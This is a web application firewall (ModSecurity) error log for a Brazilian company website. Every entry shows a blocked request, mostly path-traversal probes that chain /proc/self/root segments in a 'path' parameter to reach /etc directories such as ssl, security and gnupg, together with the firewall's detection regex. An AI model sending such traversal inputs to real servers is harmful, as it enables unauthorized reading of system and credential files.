[Mon Mar 16 14:21:01.727317 2026] [:error] [pid 15061:tid 140411699963648] [client 74.7.241.46:59334] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg7_aTCbgAP5jq5Tegz-wAAAsU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:21:06.151289 2026] [:error] [pid 21806:tid 140411716749056] [client 74.7.241.46:59336] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg8AtSswJuvopo3lOhnxQAAAIM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:21:08.587645 2026] [:error] [pid 21806:tid 140411540502272] [client 74.7.241.46:59340] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg8BNSswJuvopo3lOhnyQAAAJg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:21:10.037927 2026] [:error] [pid 15061:tid 140411582465792] [client 74.7.241.46:41234] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg8BqTCbgAP5jq5Tegz_AAAAtM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:21:11.373089 2026] [:error] [pid 11972:tid 140411557287680] [client 74.7.241.46:41246] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg8B5qj1wV0Si-Okef3cQAAABY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:21:12.557472 2026] [:error] [pid 15568:tid 140411616036608] [client 74.7.241.46:41256] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg8CKQpVkWug9HeOt8-KwAAA08"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:21:13.847958 2026] [:error] [pid 15568:tid 140411574073088] [client 74.7.241.46:41258] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg8CaQpVkWug9HeOt8-LAAAA1Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:21:15.027003 2026] [:error] [pid 10651:tid 140411691570944] [client 74.7.241.46:41270] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg8C7ysWC90G-1nBrBNGwAAAYY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:21:17.259622 2026] [:error] [pid 10831:tid 140411582465792] [client 74.7.243.203:43892] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg8DY6lpbStxTqkSkt1EgAAAlM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:21:18.357854 2026] [:error] [pid 15061:tid 140411733534464] [client 74.7.241.46:41284] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg8DqTCbgAP5jq5Tegz_gAAAsE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:21:20.649198 2026] [:error] [pid 10651:tid 140411716749056] [client 74.7.241.46:57042] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg8ELysWC90G-1nBrBNHgAAAYM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:21:23.079161 2026] [:error] [pid 11972:tid 140411683178240] [client 74.7.241.46:57050] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg8E5qj1wV0Si-Okef3dQAAAAc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:21:37.939537 2026] [:error] [pid 10772:tid 140411565680384] [client 74.7.243.203:48940] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg8If9ocpUE4ed4uDz4lAAAAhU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:21:39.290914 2026] [:error] [pid 15061:tid 140411632822016] [client 74.7.243.203:55708] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg8I6TCbgAP5jq5Teg0BAAAAs0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:21:43.183208 2026] [:error] [pid 10651:tid 140411741927168] [client 74.7.243.203:37384] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg8J7ysWC90G-1nBrBNJQAAAYA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:22:01.451251 2026] [:error] [pid 21805:tid 140411624429312] [client 74.7.243.203:37394] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg8ObABkC4fWIHEf8H31AAAAE4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:22:05.963430 2026] [:error] [pid 21805:tid 140411733534464] [client 74.7.243.203:34256] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg8PbABkC4fWIHEf8H33gAAAEE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:22:08.125458 2026] [:error] [pid 15061:tid 140411582465792] [client 74.7.228.16:37040] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abg8QKTCbgAP5jq5Teg0CAAAAtM"]
[Mon Mar 16 14:22:55.091098 2026] [:error] [pid 21805:tid 140411699963648] [client 74.7.241.46:57056] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg8b7ABkC4fWIHEf8H4DQAAAEU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:23:28.366712 2026] [:error] [pid 10651:tid 140411590858496] [client 74.7.241.46:48384] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg8kLysWC90G-1nBrBNUgAAAZI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 14:23:31.972469 2026] [:error] [pid 10772:tid 140411607643904] [client 74.7.241.46:48590] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg8k_9ocpUE4ed4uDz4pQAAAhA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:24:17.080353 2026] [:error] [pid 10831:tid 140411699963648] [client 74.7.243.203:53474] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg8wY6lpbStxTqkSkt1MQAAAkU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
